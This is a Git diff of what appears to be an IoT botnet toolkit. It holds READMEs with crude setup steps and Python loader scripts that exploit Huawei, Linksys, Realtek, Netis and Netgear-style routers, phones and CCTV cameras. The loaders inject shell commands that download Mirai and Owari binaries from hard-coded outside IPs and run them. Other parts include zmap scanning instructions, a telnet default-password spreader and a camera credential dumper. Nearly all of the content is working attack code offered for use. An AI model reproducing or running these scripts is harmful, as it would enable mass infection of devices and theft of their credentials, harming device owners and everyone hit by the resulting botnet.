|
||||
190.0.0.0/8
|
||||
191.0.0.0/8
|
||||
192.0.0.0/8
|
||||
193.0.0.0/8
|
||||
194.0.0.0/8
|
||||
195.0.0.0/8
|
||||
196.0.0.0/8
|
||||
197.0.0.0/8
|
||||
198.0.0.0/8
|
||||
199.0.0.0/8
|
||||
200.0.0.0/8
|
||||
201.0.0.0/8
|
||||
202.0.0.0/8
|
||||
203.0.0.0/8
|
||||
204.0.0.0/8
|
||||
205.0.0.0/8
|
||||
206.0.0.0/8
|
||||
207.0.0.0/8
|
||||
208.0.0.0/8
|
||||
209.0.0.0/8
|
||||
210.0.0.0/8
|
||||
211.0.0.0/8
|
||||
212.0.0.0/8
|
||||
213.0.0.0/8
|
||||
216.0.0.0/8
|
||||
217.0.0.0/8
|
||||
218.0.0.0/8
|
||||
219.0.0.0/8
|
||||
220.0.0.0/8
|
||||
221.0.0.0/8
|
||||
222.0.0.0/8
|
||||
223.0.0.0/8
|
|
@ -0,0 +1,9 @@
|
|||
1: Open (huawei.py) and edit the (SERVER IP) to your botnet ip.
|
||||
2: Edit the mips named elf to whatever your mips are named in your cross compiler.
|
||||
3: Upload the files to your server and do (sh h.sh)
|
||||
|
||||
ERROR FIXES:
|
||||
If it says no command zmap found well install zmap dumbass.
|
||||
If youre using centos use the zmap.sh file on my pastebin.
|
||||
If youre using anything other than centos do apt-get install zmap -y
|
||||
If not work nothing of that run on centos: yum install zmap -y
|
File diff suppressed because it is too large
Load Diff
File diff suppressed because one or more lines are too long
|
@ -0,0 +1,31 @@
|
|||
#! python !#
|
||||
import threading, sys, time, random, socket, re, os, struct, array, requests
|
||||
from threading import Thread
|
||||
from time import sleep
|
||||
import requests
|
||||
from requests.auth import HTTPDigestAuth
|
||||
from decimal import *
|
||||
ips = open(sys.argv[1], "r").readlines()
|
||||
cmd1 = "/bin/busybox wget -g 176.32.33.247 -l /tmp/hauwei -r /bins/kowai.mips"
|
||||
cmd2 = "chmod 777 /tmp/hauwei;/tmp/hauwei; rm -rf /tmp/hauwei"
|
||||
payload1 = "<?xml version=\"1.0\" ?>\n <s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">\n <s:Body><u:Upgrade xmlns:u=\"urn:schemas-upnp-org:service:WANPPPConnection:1\">\n <NewStatusURL>$(" + cmd1 + ")</NewStatusURL>\n<NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL>\n</u:Upgrade>\n </s:Body>\n </s:Envelope>"
|
||||
payload2 = "<?xml version=\"1.0\" ?>\n <s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">\n <s:Body><u:Upgrade xmlns:u=\"urn:schemas-upnp-org:service:WANPPPConnection:1\">\n <NewStatusURL>$(" + cmd2 + ")</NewStatusURL>\n<NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL>\n</u:Upgrade>\n </s:Body>\n </s:Envelope>"
|
||||
class rtek(threading.Thread):
|
||||
def __init__ (self, ip):
|
||||
threading.Thread.__init__(self)
|
||||
self.ip = str(ip).rstrip('\n')
|
||||
def run(self):
|
||||
try:
|
||||
print "[Huawei] Loading - " + self.ip
|
||||
url = "http://" + self.ip + ":37215/ctrlt/DeviceUpgrade_1"
|
||||
requests.post(url, timeout=3, data=payload1, auth=HTTPDigestAuth('dslf-config', 'admin'))
|
||||
requests.post(url, timeout=2.5, data=payload2, auth=HTTPDigestAuth('dslf-config', 'admin'))
|
||||
except Exception as e:
|
||||
pass
|
||||
for ip in ips:
|
||||
try:
|
||||
n = rtek(ip)
|
||||
n.start()
|
||||
time.sleep(0.03)
|
||||
except:
|
||||
pass
|
|
@ -0,0 +1,16 @@
|
|||
yum update -y
|
||||
yum install gcc cmake gmp gmp-devel libpcap-devel gengetopt byacc flex -y
|
||||
yum install json-c-doc.noarch json-c.i686 json-c.x86_64 json-c-devel.i686 json-c-devel.x86_64 -y
|
||||
yum install epel-release -y
|
||||
yum install gengetopt -y
|
||||
wget https://github.com/zmap/zmap/archive/v2.1.0.tar.gz
|
||||
tar -xvf v2.1.0.tar.gz
|
||||
cd zmap-2.1.0
|
||||
flex -o "src/lexer.c" --header-file="src/lexer.h" "src/lexer.l"
|
||||
byacc -d -o "src/parser.c" "src/parser.y"
|
||||
mkdir /etc/zmap
|
||||
cp conf/* /etc/zmap
|
||||
cmake -DENABLE_HARDENING=ON
|
||||
make
|
||||
make install
|
||||
cd
|
|
@ -0,0 +1,77 @@
|
|||
import urllib.request, threading, socket, time, sys
|
||||
if len(sys.argv) != 2:
|
||||
print("Correct useage: python " + sys.argv[0].split("\\").pop() + " <thread count> ")
|
||||
sys.exit()
|
||||
|
||||
lock, finalprintout, timeout, creds, threads, threadcount, leak, total = threading.Lock(), "", 5, [], [], int(sys.argv[1]), "http://TARGET/system.ini?loginuse&loginpas", 0
|
||||
|
||||
# Open output.txt
|
||||
list = open("output.txt", "r")
|
||||
scan = list.read()
|
||||
list.close()
|
||||
|
||||
scan = scan.split("\n")
|
||||
while "\n" in scan:
|
||||
scan.remove("\n")
|
||||
pretotal = len(scan)
|
||||
def dumpcreds():
|
||||
global finalprintout
|
||||
global total
|
||||
global scan
|
||||
while len(scan) > 0:
|
||||
try:
|
||||
with lock:
|
||||
ip = scan.pop()
|
||||
with urllib.request.urlopen(leak.replace("TARGET", ip), None, timeout) as response:
|
||||
reply = str(response.read())
|
||||
if reply.find("admin") != -1:
|
||||
reply = reply[reply.find("admin"):]
|
||||
while reply.find("\\x00") != -1:
|
||||
reply = reply.replace("\\x00", "")
|
||||
password = reply[5:reply.find("\\")]
|
||||
if password.find("/") != -1:
|
||||
password = password[:password.find("/")]
|
||||
print("\x1b[0;37m[\x1b[0;35m*\x1b[0;37m] |\x1b[0;35mFound\x1b[0;37m| admin:" + password + "@" + ip)
|
||||
with lock:
|
||||
finalprintout += ip + ":admin:" + password + "\n"
|
||||
total += 1
|
||||
except:
|
||||
pass
|
||||
|
||||
print(" \x1b[1;37m[\x1b[1;35m+\x1b[1;37m] \x1b[1;35mCCTV Camera Exploit \x1b[1;37m[\x1b[1;35m+\x1b[1;37m]\x1b[0m")
|
||||
print(" \x1b[1;37m[\x1b[1;31m*\x1b[1;37m] \x1b[1;36mCredits go to ★Cam★ \x1b[1;37m[\x1b[1;31m*\x1b[1;37m]")
|
||||
time.sleep(6)
|
||||
print(" \x1b[1;35mDumping Credentials, please wait")
|
||||
time.sleep(4)
|
||||
|
||||
for i in range(0, threadcount+1):
|
||||
threads.append(threading.Thread(target=dumpcreds))
|
||||
|
||||
for thread in threads:
|
||||
try:
|
||||
thread.daemon = True
|
||||
thread.start()
|
||||
except:
|
||||
pass
|
||||
|
||||
for thread in threads:
|
||||
try:
|
||||
thread.join()
|
||||
except:
|
||||
pass
|
||||
|
||||
while 1:
|
||||
time.sleep(1)
|
||||
done = False
|
||||
for thread in threads:
|
||||
if thread.isAlive() == True:
|
||||
done = False
|
||||
break
|
||||
else:
|
||||
done = True
|
||||
if done == True:
|
||||
writingit = open("vuln.txt", "w")
|
||||
writingit.write(finalprintout)
|
||||
writingit.close()
|
||||
print(str(total) + " of out " + str(pretotal) + " credentials dumped, " + str(int(100 / pretotal * total)) + "% success rate. ")
|
||||
break
|
|
@ -0,0 +1,39 @@
|
|||
#! python !#
|
||||
import threading, sys, time, random, socket, subprocess, re, os, base64, struct, array, requests
|
||||
from threading import Thread
|
||||
from time import sleep
|
||||
import requests
|
||||
from requests.auth import HTTPDigestAuth
|
||||
from decimal import *
|
||||
ips = open(sys.argv[1], "r").readlines()
|
||||
|
||||
url_data = {
|
||||
"submit_button": "",
|
||||
"change_action": "",
|
||||
"action": "",
|
||||
"commit": "0",
|
||||
"ttcp_num": "2",
|
||||
"ttcp_size": "2",
|
||||
"ttcp_ip": "-h `cd /tmp; rm -rf kowai.mpsl; wget http://176.32.33.247/bins/kowai.mpsl; chmod 777 kowai.mpsl; ./kowai.mpsl linksys`",
|
||||
"StartEPI": "1",
|
||||
}
|
||||
|
||||
class rtek(threading.Thread):
|
||||
def __init__ (self, ip):
|
||||
threading.Thread.__init__(self)
|
||||
self.ip = str(ip).rstrip('\n')
|
||||
def run(self):
|
||||
try:
|
||||
print "[LINKSYS] Loading - " + self.ip
|
||||
url = "http://"+self.ip+":8080/tmUnblock.cgi"
|
||||
requests.post(url, data=url_data, timeout=3)
|
||||
requests.get(url, timeout=3)
|
||||
except Exception as e:
|
||||
pass
|
||||
for ip in ips:
|
||||
try:
|
||||
n = rtek(ip)
|
||||
n.start()
|
||||
time.sleep(0.03)
|
||||
except:
|
||||
pass
|
Binary file not shown.
|
@ -0,0 +1,12 @@
|
|||
Port scanning for this exploit: 8443
|
||||
|
||||
# First of all edit the LINE AROUND 33/34 with your Mirai BINS.
|
||||
---------------------------------------
|
||||
Then run simply a scan with zmap
|
||||
|
||||
# zmap -p8443 -omfu.txt -N 450000
|
||||
or using the .lst
|
||||
# zmap -p8443 -omfu.txt -w listname.lst
|
||||
|
||||
|
||||
zmap -p8443 -N 250000 -omfu.txt
|
File diff suppressed because it is too large
Load Diff
|
@ -0,0 +1,47 @@
|
|||
import threading, random, socket, time, sys, requests, re
|
||||
|
||||
|
||||
if len(sys.argv) < 2:
|
||||
print "\033[37mHow to use: python "+sys.argv[0]+" <list>\033[37m"
|
||||
sys.exit()
|
||||
|
||||
server_ip = "159.89.33.167"
|
||||
port = 8443
|
||||
# CONFIGURE URL LINE 33 MIPS BINARY DEFAULT: "ntpd"
|
||||
class r7000(threading.Thread):
|
||||
def __init__ (self, ip):
|
||||
threading.Thread.__init__(self)
|
||||
self.ip = str(ip).rstrip('\n')
|
||||
def run(self):
|
||||
try:
|
||||
try:
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
s.settimeout(4)
|
||||
s.connect((self.ip, port))
|
||||
s.close()
|
||||
fail = 0
|
||||
except:
|
||||
fail = 1
|
||||
pass
|
||||
try:
|
||||
if fail:
|
||||
pass
|
||||
else:
|
||||
r = requests.get("http://"+self.ip+":8443/cgi-bin/;cd${IFS}/var/tmp;${IFS}wget${IFS}http://"+server_ip+"/bins/Owari.x86;${IFS}chmod${IFS}777${IFS}Owari.x86;${IFS}./Owari.x86;${IFS}rm${IFS}-rf${IFS}Owari.x86;", timeout=12)
|
||||
if r.status_code == 200 and "Not Found" not in r.text:
|
||||
print "INFECTED "+self.ip
|
||||
elif r.status_code == 404:
|
||||
sys.exit()
|
||||
except:
|
||||
pass
|
||||
except Exception as e:
|
||||
pass
|
||||
|
||||
ips = open(sys.argv[1], "r").readlines()
|
||||
for ip in ips:
|
||||
try:
|
||||
t = r7000(ip)
|
||||
t.start()
|
||||
time.sleep(0.01)
|
||||
except Exception as e:
|
||||
pass
|
|
@ -0,0 +1,47 @@
|
|||
There are multiple ways to scan netis so we are going to go over
|
||||
all of them here. They are all very simple just pay attention.
|
||||
|
||||
...........................................................................................................
|
||||
Lets start with installing what you will need to scan it.
|
||||
|
||||
For Centos:
|
||||
yum update -y; yum install python python-requests python-paramiko -y
|
||||
(Download the file named zmap.sh from my pastebin and upload it)
|
||||
sh zmap.sh
|
||||
|
||||
For any other os:
|
||||
apt-get update -y; apt-get install zmap python python-requests python-paramiko -y
|
||||
...........................................................................................................
|
||||
-----------------------------------------------------------------------------------------------------------
|
||||
...........................................................................................................
|
||||
Now, for the first method of scanning netis you need to run these commands on your server:
|
||||
python -c "pring 'A'*8 + 'netcore \x00'" > login
|
||||
|
||||
Then:
|
||||
|
||||
python -c "print 'AA\x00\x00AAAA (YOUR PAYLOAD HERE)*\x00'" > payload
|
||||
...........................................................................................................
|
||||
-----------------------------------------------------------------------------------------------------------
|
||||
...........................................................................................................
|
||||
One way to scan netis is with a sh file.
|
||||
|
||||
1: nano anything.sh
|
||||
2: paste the ranges found on my pastebin or add your own
|
||||
3: sh anything.sh
|
||||
An example of the ranges would be
|
||||
(zmap -M udp -p53413 --probe-args=file:login -i eth0 1.0.0.0/8)
|
||||
Doing this will run the zmap command scanning all the ranges in the sh file.
|
||||
...........................................................................................................
|
||||
-----------------------------------------------------------------------------------------------------------
|
||||
...........................................................................................................
|
||||
Another way to scan zmap is with a .lst file.
|
||||
Download the .lst files as well as a loader and a sh file
|
||||
that will run the commands to scan for you from the zip file
|
||||
using the link at the bottom of the paste.
|
||||
|
||||
1: download the files
|
||||
2: upload the files
|
||||
3: sh netis.sh
|
||||
...........................................................................................................
|
||||
-----------------------------------------------------------------------------------------------------------
|
||||
...........................................................................................................
|
Binary file not shown.
File diff suppressed because it is too large
Load Diff
File diff suppressed because it is too large
Load Diff
|
@ -0,0 +1,35 @@
|
|||
#!/usr/bin/python
|
||||
# netis loader
|
||||
# by light
|
||||
|
||||
import threading, sys, time, random, socket, re, os
|
||||
|
||||
if len(sys.argv) < 2:
|
||||
print "Usage: python "+sys.argv[0]+" <list>"
|
||||
sys.exit()
|
||||
|
||||
loginpayload = "AAAAAAAAnetcore\x00"
|
||||
commandpayload = "AA\x00\x00AAAA (PAYLOAD HERE)"
|
||||
list = open(sys.argv[1], "r").readlines()
|
||||
offline = 0
|
||||
class netis(threading.Thread):
|
||||
def __init__ (self, ip):
|
||||
threading.Thread.__init__(self)
|
||||
self.ip = str(ip).rstrip('\n')
|
||||
def run(self):
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
|
||||
try:
|
||||
print "\033[31m[\033[32m+\033[31m] \033[32mAttempting:\033[32m %s"%(self.ip)
|
||||
s.sendto(loginpayload, (self.ip, 53413))
|
||||
time.sleep(1.5)
|
||||
s.sendto(commandpayload, (self.ip, 53413))
|
||||
time.sleep(30)
|
||||
except Exception:
|
||||
pass
|
||||
for ip in list:
|
||||
try:
|
||||
t = netis(ip)
|
||||
t.start()
|
||||
time.sleep(0.01)
|
||||
except:
|
||||
pass
|
|
@ -0,0 +1 @@
|
|||
ulimit -n 999999; zmap -M udp -p53413 -i eth0 -wyay.lst -oyay.txt; python netis.py yay.txt; zmap -M udp -p53413 -i eth0 -wgodly.lst -ogodly.txt; python netis.py godly.txt; zmap -M udp -p53413 -i eth0 -wbanana.lst -obanana.txt; python netis.py banana.txt;
|
File diff suppressed because one or more lines are too long
File diff suppressed because it is too large
Load Diff
|
@ -0,0 +1,35 @@
|
|||
#!/usr/bin/python
|
||||
# netis loader
|
||||
# by light
|
||||
|
||||
import threading, sys, time, random, socket, re, os
|
||||
|
||||
if len(sys.argv) < 2:
|
||||
print "Usage: python "+sys.argv[0]+" <list>"
|
||||
sys.exit()
|
||||
|
||||
loginpayload = "AAAAAAAAnetcore\x00"
|
||||
commandpayload = "AA\x00\x00AAAA (PAYLOAD)"
|
||||
list = open(sys.argv[1], "r").readlines()
|
||||
offline = 0
|
||||
class netis(threading.Thread):
|
||||
def __init__ (self, ip):
|
||||
threading.Thread.__init__(self)
|
||||
self.ip = str(ip).rstrip('\n')
|
||||
def run(self):
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
|
||||
try:
|
||||
print "\033[31m[\033[32m+\033[31m] \033[32mAttempting:\033[32m %s"%(self.ip)
|
||||
s.sendto(loginpayload, (self.ip, 53413))
|
||||
time.sleep(1.5)
|
||||
s.sendto(commandpayload, (self.ip, 53413))
|
||||
time.sleep(30)
|
||||
except Exception:
|
||||
pass
|
||||
for ip in list:
|
||||
try:
|
||||
t = netis(ip)
|
||||
t.start()
|
||||
time.sleep(0.01)
|
||||
except:
|
||||
pass
|
|
@ -0,0 +1,98 @@
|
|||
#!/usr/bin/python
|
||||
# Phone Swiper Scanner
|
||||
|
||||
import threading, sys, time, random, socket, re, os
|
||||
|
||||
if len(sys.argv) < 3:
|
||||
print "Phone Swiper Scanner\n"
|
||||
print "Usage: python "+sys.argv[0]+" <threads(1-100+)> <ips(1-1000+)>"
|
||||
sys.exit()
|
||||
|
||||
usernames = ["root", "admin"]
|
||||
passwords = ["oelinux123", "admin"]
|
||||
url = "http://103.194.169.245/tftp" # ARM4 Bin
|
||||
threads = int(sys.argv[1])
|
||||
ipz = int(sys.argv[2])
|
||||
Tranges = ["119.150","119.151","119.152","119.153","119.154","119.155","119.156","119.157","119.158","119.159","182.184","182.185","182.186","182.187","182.188","182.189","182.190","182.191"]
|
||||
|
||||
def readUntil(tn, string, timeout=8):
|
||||
buf = ''
|
||||
start_time = time.time()
|
||||
while time.time() - start_time < timeout:
|
||||
buf += tn.recv(1024)
|
||||
time.sleep(0.01)
|
||||
if string in buf: return buf
|
||||
raise Exception('TIMEOUT!')
|
||||
|
||||
def worker():
|
||||
try:
|
||||
print "\033[33mStarting Telnet Thread\033[37m"
|
||||
while True:
|
||||
try:
|
||||
h0h0h0 = h0h0 + 1
|
||||
br2 = random.choice(Tranges)
|
||||
for x in xrange(h0h0h0):
|
||||
try:
|
||||
ip = ''+br2+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
|
||||
t = telnet(ip)
|
||||
t.start()
|
||||
time.sleep(0.009)
|
||||
except:
|
||||
pass
|
||||
time.sleep(2)
|
||||
except:
|
||||
print "\033[31mWORKER ERROR\033[37m"
|
||||
pass
|
||||
except:
|
||||
pass
|
||||
|
||||
class telnet(threading.Thread):
|
||||
def __init__ (self, ip):
|
||||
threading.Thread.__init__(self)
|
||||
self.ip = str(ip).rstrip('\n')
|
||||
def run(self):
|
||||
try:
|
||||
tn = socket.socket()
|
||||
tn.settimeout(8)
|
||||
tn.connect((self.ip,23))
|
||||
except Exception:
|
||||
pass
|
||||
try:
|
||||
hoho = ''
|
||||
hoho += readUntil(tn, ":")
|
||||
if "mdm9625" in hoho:
|
||||
r00t = 0
|
||||
username = usernames[1]
|
||||
password = passwords[1]
|
||||
tn.send(username + "\n")
|
||||
if "9615-cdp" in hoho:
|
||||
r00t = 1
|
||||
username = usernames[0]
|
||||
password = passwords[0]
|
||||
tn.send(username + "\n")
|
||||
except Exception:
|
||||
pass
|
||||
try:
|
||||
hoho = ''
|
||||
hoho += readUntil(tn, ":")
|
||||
if "assword" in hoho:
|
||||
tn.send(password + "\n")
|
||||
time.sleep(3.5)
|
||||
except Exception:
|
||||
pass
|
||||
try:
|
||||
mp = ''
|
||||
mp += tn.recv(1024)
|
||||
if "#" in mp or "$" in mp or "~" in mp or ">" in mp or "root@" in mp: # !DO NOT CHANGE ANYTHING! #
|
||||
if r00t: tn.send("cd /tmp; rm -rf phone; wget "+url+" -O phone; chmod 777 phone; ./phone; rm -rf phone" + "\n"); print "\033[32m[PHONE] Command Sent %s!\033[37m"%(self.ip); time.sleep(8); tn.close()
|
||||
if not r00t: tn.send("su" + "\n"); readUntil(tn, "Password:"); tn.send(passwords[0] + "\n"); time.sleep(1); tn.send("cd /tmp; wget "+url+" -O phone; chmod 777 phone; ./phone; rm -rf phone" + "\n"); print "\033[32m[PHONE] Command Sent %s!\033[37m"%(self.ip); time.sleep(8); tn.close()
|
||||
except Exception:
|
||||
pass
|
||||
|
||||
for g in xrange(threads):
|
||||
try:
|
||||
t = threading.Thread(target=worker)
|
||||
t.start()
|
||||
time.sleep(0.002)
|
||||
except:
|
||||
pass
|
|
@ -0,0 +1,13 @@
|
|||
Step 1: Installing the Dependancies
|
||||
sudo yum install -y https://centos7.iuscommunity.org/ius-release.rpm
|
||||
sudo yum update -y
|
||||
sudo yum install -y python36u python36u-libs python36u-devel python36u-pip
|
||||
pip3.6 install requests
|
||||
|
||||
Step 2: Edit Realtek.py with the Mips of the mirai source and with the mirai ip
|
||||
*Use Mips Payload
|
||||
|
||||
Step 3: Scanning
|
||||
sh j.sh
|
||||
|
||||
Step 4: BIG MOTHERFUCKING BOATS
|
|
@ -0,0 +1,29 @@
|
|||
#! python !#
|
||||
import threading, sys, time, random, socket, re, os, struct, array, requests
|
||||
ips = open(sys.argv[1], "r").readlines()
|
||||
binloc = "http://104.248.137.98/Binarys/Owari.mips"
|
||||
rm = "<?xml version=\"1.0\" ?><s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><s:Body><u:AddPortMapping xmlns:u=\"urn:schemas-upnp-org:service:WANIPConnection:1\"><NewRemoteHost></NewRemoteHost><NewExternalPort>47449</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /tmp/; rm -rf t`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>"
|
||||
wget = "<?xml version=\"1.0\" ?><s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><s:Body><u:AddPortMapping xmlns:u=\"urn:schemas-upnp-org:service:WANIPConnection:1\"><NewRemoteHost></NewRemoteHost><NewExternalPort>47450</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /tmp/; wget "+binloc+" -O t`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>"
|
||||
execute = "<?xml version=\"1.0\" ?><s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><s:Body><u:AddPortMapping xmlns:u=\"urn:schemas-upnp-org:service:WANIPConnection:1\"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /tmp/; chmod 777 t; ./t realtek`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>"
|
||||
headerlist = {'SOAPAction': 'urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping'}
|
||||
|
||||
class rtek(threading.Thread):
|
||||
def __init__ (self, ip):
|
||||
threading.Thread.__init__(self)
|
||||
self.ip = str(ip).rstrip('\n')
|
||||
def run(self):
|
||||
try:
|
||||
url = "http://" + self.ip + ":52869/picsdesc.xml"
|
||||
requests.post(url, timeout=10, headers=headerlist, data=rm)
|
||||
requests.post(url, timeout=10, headers=headerlist, data=wget)
|
||||
requests.post(url, timeout=10, headers=headerlist, data=execute)
|
||||
print ("[REALTEK] Loading " + self.ip)
|
||||
except Exception as e:
|
||||
pass
|
||||
|
||||
for ip in ips:
|
||||
try:
|
||||
n = rtek(ip)
|
||||
n.start()
|
||||
except:
|
||||
pass
|
File diff suppressed because one or more lines are too long
File diff suppressed because it is too large
Load Diff
File diff suppressed because it is too large
Load Diff
|
@ -0,0 +1,15 @@
|
|||
Hello world, fuck my life
|
||||
|
||||
1) edit ur fucking yarn.py with your mirai server and your mirai bins
|
||||
2) start the yarn exploit trought: python yarn.py mfu.txt
|
||||
3) fuck your life
|
||||
|
||||
enjoy
|
||||
|
||||
|
||||
NOTE: If you want to scan your self mfu.tx
|
||||
run trought "zmap"
|
||||
|
||||
# zmap -p8088 -omfu.txt -N 450000
|
||||
or using the .lst
|
||||
# zmap -p8088 -omfu.txt -w listname.lst
|
File diff suppressed because it is too large
Load Diff
File diff suppressed because it is too large
Load Diff
Some files were not shown because too many files have changed in this diff Show More
Loading…
Reference in New Issue